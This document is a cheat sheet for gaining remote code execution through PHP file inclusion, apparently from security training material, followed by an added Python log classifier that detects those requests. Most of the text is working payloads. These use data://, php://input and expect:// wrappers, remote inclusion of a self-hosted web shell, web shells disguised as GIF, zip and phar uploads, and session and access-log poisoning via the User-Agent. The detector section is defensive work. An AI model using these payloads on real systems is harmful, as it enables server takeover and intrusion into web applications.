Remote Code Execution
PHP Wrappers
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
RCE with data wrapper
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
RCE with input wrapper
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
RCE with expect wrapper
RFI
echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>
Host web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
Include remote PHP web shell
LFI and File Uploads
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
Create malicious image
/index.php?language=./profile_images/shell.gif&cmd=id
RCE with malicious uploaded image
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
Create malicious zip archive 'as jpg'
/index.php?language=zip://shell.zip%23shell.php&cmd=id
RCE with malicious uploaded zip
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
Create malicious phar 'as jpg'
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
RCE with malicious uploaded phar
Log Poisoning
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
Read PHP session parameters
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
Poison PHP session with web shell
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
RCE through poisoned PHP session
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
Poison server log
/index.php?language=/var/log/apache2/access.log&cmd=id
RCE through poisoned server log
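Detection view of the requests listed above, as an added example that is not part of the original cheat sheet: a Python classifier that flags these patterns in a web server access log. It assumes Apache combined log format and the `language` parameter used on this page; the function names, finding labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Indicators drawn from the request patterns listed on this page.
WRAPPER = re.compile(r"^(data|php|expect|zip|phar|https?)://", re.I)
LOG_OR_SESSION = re.compile(r"/var/(lib/php/sessions/sess_|log/)")
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LINE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "(.*)"$')

def classify(line, param="language"):
    """Return a sorted list of findings for one access-log line."""
    m = LINE.match(line)
    if not m:
        return ["unparsed"]
    target, agent = m.groups()
    findings = set()
    # parse_qs percent-decodes values, so %3C%3Fphp in the URL is inspected as <?php
    values = parse_qs(target.partition("?")[2], keep_blank_values=True).get(param, [])
    for value in values:
        w = WRAPPER.match(value)
        if w:
            findings.add("wrapper:" + w.group(1).lower())
        if LOG_OR_SESSION.search(value):
            findings.add("log-or-session-include")
        if PHP_TAG.search(value):
            findings.add("php-tag-in-parameter")
    if PHP_TAG.search(agent):
        findings.add("php-tag-in-user-agent")
    return sorted(findings)

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "POST /index.php?language=php://input&cmd=id HTTP/1.1" 200 40 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 200 40 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    '198.51.100.7 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 900 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id HTTP/1.1" 200 40 "-" "curl/8.0"',
]

def scan(lines):
    """Map line index -> findings, keeping only lines that produced a finding."""
    return {i: f for i, line in enumerate(lines) if (f := classify(line))}
```

A PHP tag in the User-Agent or in the parameter value marks the poisoning step, while a later `log-or-session-include` hit from the same client marks the inclusion step, so the two findings are worth correlating per source address.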